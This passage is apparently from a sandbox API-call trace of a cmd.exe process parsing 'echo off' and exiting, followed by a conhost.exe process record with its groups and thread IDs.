(HeapHandle=0x2d10000, Flags=0x0, BaseAddress=0x2d1a4b8) returned 1 [0036.907] GetConsoleOutputCP () returned 0x1b5 [0036.907] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x273850 | out: lpCPInfo=0x273850) returned 1 [0036.907] GetUserDefaultLCID () returned 0x409 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x26f82c, cchData=8 | out: lpLCData=":") returned 2 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2affc00, cchData=128 | out: lpLCData="0") returned 2 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2affc00, cchData=128 | out: lpLCData="0") returned 2 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2affc00, cchData=128 | out: lpLCData="1") returned 2 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x26f81c, cchData=8 | out: lpLCData="/") returned 2 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x26f7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x26f778, cchData=32 | out: lpLCData="Tue") returned 4 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x26f738, cchData=32 | out: lpLCData="Wed") returned 4 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x26f6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x26f6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x26f678, cchData=32 | out: lpLCData="Sat") returned 4 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x26f638, cchData=32 | out: lpLCData="Sun") returned 4 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x26f80c, cchData=8 | out: lpLCData=".") returned 2 [0036.908] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x26f7f8, cchData=8 | out: lpLCData=",") returned 2 [0036.908] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0036.911] GetProcessHeap () returned 0x2d10000 [0036.911] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x0, Size=0x20c) returned 0x2d11210 [0036.911] GetConsoleTitleW (in: lpConsoleTitle=0x2d11210, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0036.918] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.918] GetProcAddress (hModule=0x75e90000, lpProcName="CopyFileExW") returned 0x75ea4330 [0036.918] GetProcAddress (hModule=0x75e90000, lpProcName="IsDebuggerPresent") returned 0x75ea5930 [0036.918] GetProcAddress (hModule=0x75e90000, lpProcName="SetConsoleInputExeNameW") returned 0x74fe09d0 [0036.918] ??_V@YAXPAX@Z () returned 0x1 [0036.919] GetProcessHeap () returned 0x2d10000 [0036.919] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0x400a) returned 0x2d1a4b8 [0036.919] GetProcessHeap () returned 0x2d10000 [0036.919] RtlFreeHeap (HeapHandle=0x2d10000, Flags=0x0, BaseAddress=0x2d1a4b8) returned 1 [0036.919] GetProcessHeap () returned 0x2d10000 [0036.919] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0x58) returned 0x2d11428 [0036.920] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.920] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.920] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.920] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.920] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.920] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.920] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.920] GetProcessHeap () returned 0x2d10000 [0036.920] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0x58) returned 0x2d11488 [0036.920] GetProcessHeap () returned 0x2d10000 [0036.920] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0x12) returned 0x2d114e8 [0036.920] GetProcessHeap () returned 0x2d10000 [0036.920] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0x12) returned 0x2d11508 [0036.921] GetConsoleTitleW (in: lpConsoleTitle=0x2affa98, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0036.934] malloc (_Size=0xffce) returned 0x2e22f50 [0036.935] ??_V@YAXPAX@Z () returned 0x2aff824 [0036.935] malloc (_Size=0xffce) returned 0x2e32f28 [0036.935] ??_V@YAXPAX@Z () returned 0x2aff5dc [0036.936] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.936] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.936] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.936] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.936] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.936] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.936] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.936] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.936] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.936] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.936] ??_V@YAXPAX@Z () returned 0x1 [0036.936] GetProcessHeap () returned 0x2d10000 [0036.936] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0x1c) returned 0x2d11528 [0036.936] GetProcessHeap () returned 0x2d10000 [0036.936] RtlReAllocateHeap (Heap=0x2d10000, Flags=0x0, Ptr=0x2d11528, Size=0x12) returned 0x2d11528 [0036.936] GetProcessHeap () returned 0x2d10000 [0036.936] RtlSizeHeap (HeapHandle=0x2d10000, Flags=0x0, MemoryPointer=0x2d11528) returned 0x12 [0036.936] GetProcessHeap () returned 0x2d10000 [0036.936] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0x1c) returned 0x2d11550 [0036.937] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0036.937] ??_V@YAXPAX@Z () returned 0x1 [0036.937] _get_osfhandle (_FileHandle=1) returned 0x90 [0036.937] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0036.948] _get_osfhandle (_FileHandle=1) returned 0x90 [0036.948] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x273890 | out: lpMode=0x273890) returned 1 [0036.973] _get_osfhandle (_FileHandle=0) returned 0x8c [0036.973] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0x273894 | out: lpMode=0x273894) returned 1 [0037.014] SetConsoleInputExeNameW () returned 0x1 [0037.014] GetConsoleOutputCP () returned 0x1b5 [0037.024] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x273850 | out: lpCPInfo=0x273850) returned 1 [0037.024] SetThreadUILanguage (LangId=0x0) returned 0x28c0409 [0037.051] exit (_Code=0) [0037.051] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 9 os_tid = 0x9e0 Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x47d51000" os_pid = "0xb98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xc04" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4 os_tid = 0xdfc Thread: id = 5 os_tid = 0x8f4 Thread: id = 6 os_tid = 0xe0 Thread: id = 7 os_tid = 0x49c Thread: id = 8 os_tid = 0x384